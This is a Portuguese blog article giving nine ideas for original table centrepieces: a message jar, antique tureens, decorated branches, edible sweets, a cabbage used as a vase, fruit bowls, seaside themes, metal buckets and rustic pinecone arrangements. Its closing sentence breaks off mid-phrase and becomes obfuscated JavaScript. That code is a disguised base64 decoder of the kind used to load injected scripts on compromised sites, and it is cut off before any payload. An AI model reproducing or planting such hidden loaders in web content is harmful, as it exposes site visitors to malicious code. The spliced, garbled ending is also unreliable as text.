Centros de mesa originais – 9 sugestões
No decorrer do ano usamos centros de mesa em datas que marcamos no calendário, datas em que gostamos de juntar os familiares amigos em nossa casa ou em casa deles e celebrar o melhor da vida. Nada é mais agradável que um convívio em torno de uma mesa de refeições farta em petiscos… e amor. Decorarmos a mesa onde recebemos os nossos demonstra o cuidado e apreço que temos por eles, por isso, queremos sempre fazer um brilharete. Contudo por vezes acontece ficarmos sem ideias.
A boa notícia é que não necessitamos de muito para marcar a diferença na decoração da mesa de jantar. Com pouco podemos deixar os nossos convidados surpreendidos. Ora veja.
Esta é uma ideia deliciosa para ocasiões em que celebramos, por exemplo, o noivado, o fim dos estudos ou a gravidez de alguém. Colocamos no centro da mesa um recipiente, podendo este ser tanto uma mala antiga, como um cesto de vime ou mesmo uma jarra larga. Dentro enchemos de papelinhos, dobrados da forma que mais gostarmos e depois é só esperar que cada um dos convidados se encarregue de escrever mensagens com votos de muitas felicidades. Depois entretenham-se durante a refeição a ler as dedicatórias! Fica com um centro de mesa original, interativo e ainda guarda uma recordação especial!
Nem sempre temos de comprar jarras especiais para colocar no centro da nossa mesa de refeições. Uma ideia fantástica é reutilizar aquelas peças de loiça especiais que herdámos dos nossos avós, por exemplo, as sopeiras. Antigamente os conjuntos de mesa eram lindíssimos, pintados à mão, com gravuras únicas. Se fizer um arranjo mais requintado, com flores a condizer, ficará garantidamente, com uma peça de centro deslumbrante. Para além de que, homenageia os donos originais da peça.
Para fugir à ideia de que os centros de mesa têm que ter sempre flores, há umas quantas soluções. Esta é uma delas: traga do jardim alguns ramos secos, coloque-os dentro de uma jarra e decore a seu gosto, com o que já tem em casa. Pode fazer recortes de papel em forma de folhas, pode prender pedacinhos de tecido coloridos aos ramos, pode usar fios com pequenas contas! É só deixar a imaginação voar!
Há por aí por casa miúdos ou graúdos gulosos?! Dê-lhes um miminho especial em jeito de centro de mesa comestível! É perfeito para os aniversários dos mais novos, mas os mais velhos também agradecem!
Quem disse que não podia improvisar, mesmo quando a florista lá do bairro já fechou? Use os doces que tinha reservados para a festa e faça com eles um bonito arranjo. Coloque no centro da mesa à disposição de todos e... torça para que dure até ao final da refeição!
Já ouviu aquela expressão "quem não tem cão, caça com gato"?! Pois bem, não será por falta de recipiente para o seu arranjo que não fará um vistaço com a decoração da sua mesa de festa! Se não tem jarras bonitas, improvise com uma couve! Sim, uma couve! É muito fácil de fazer, só tem que retirar parte do conteúdo no meio e reservar para futuros cozinhados. Depois, coloque no espaço que ganhou, um pequeno copo com água no fundo. De seguida, preencha com o arranjo floral. Também resulta muito bem se combinar a couve roxa com flores do mesmo tom! Os seus convidados vão ficar surpreendidos com a sua criatividade.
No verão apetece comer frutas frescas e suculentas, por isso, esta ideia vem mesmo a calhar. Em vez dos típicos centros de mesa floridos, pode optar por conjugar, numa taça grande e bonita, frutos que condigam com a sua toalha de mesa... por exemplo, citrinos. Para um toque especial e perfumado, distribua estrategicamente na taça pequenas flores delicadas e alguns raminhos de ervas aromáticas como jasmim ou alecrim. Se preferir junte frutos secos como amêndoas ou avelãs. Vai ficar lindo!
Para uma mesa que "cheira e sabe" a férias e dias quentes, use motivos marinhos nos centros de mesa. Pode fazer arranjos em recipientes de todos os tamanhos e feitios, só necessita que sejam transparentes. Se encher com água pode colocar em cima uma vela flutuante mas, se preferir, a areia também fica muito bem em vez da água. Nesse caso, pode colocar uma vela mais fina e alta, espetada na areia. Experimente!
Uma ideia muito simples mas que funciona na perfeição para aqueles convívios em que o menu é muito simples, como pizas, hamburgueres no pão, cachorros quentes e batatas fritas, são estes baldes de metal. Eles são multi funções, dado que servem para mais do que colocar flores, por isso, uma ideia divertida é distribuir os molhos pela mesa, dentro deles. Como são toscos, coloque-lhes um adereço, por exemplo, um laço bonito e já está! Gosta?
Para uma mesa mais rústica, também tem várias opções de centros de mesa, mas há duas que são fantásticas! A primeira são os arranjos com folhas secas, por exemplo as de louro ou de magnólia. A segunda, os arranjos com pinhas. O melhor destas duas opções é o facto de poderem estar muito tempo sem se estragar, uma vez que já estão secas.
Se gostou destes centros de mesa fantásticos, veja também estas mesas de jantar e estas cadeiras de sonho. Descubra ainda porque é que function a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<<2)|(w9>>4);w6=((w9&15)<<4)|(we>>2);qe=((we&3)<<6)|n7;if(n6>=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa